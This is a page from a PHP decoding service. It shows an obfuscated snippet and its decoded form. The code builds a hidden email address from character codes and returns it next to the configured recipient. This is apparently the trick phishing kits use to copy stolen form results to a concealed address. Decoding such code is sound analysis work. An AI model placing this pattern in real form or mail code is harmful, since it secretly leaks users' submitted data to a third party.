Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$sorter = ""; $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,10..
Decoded Output download
<? $sorter = "";
$array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
$count = count($array);
for ($i = 0; $i < $count; $i++) {
$sorter .= chr($array[$i]);
}
return array($sorter, $GLOBALS['recipient']); ?>
Did this file decode correctly?
Original Code
$sorter = "";
$array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
$count = count($array);
for ($i = 0; $i < $count; $i++) {
$sorter .= chr($array[$i]);
}
return array($sorter, $GLOBALS['recipient']);
Function Calls
chr | 21 |
count | 1 |
Stats
MD5 | acd9c243f730342d421e8db0ac73fdaa |
Eval Count | 0 |
Decode Time | 100 ms |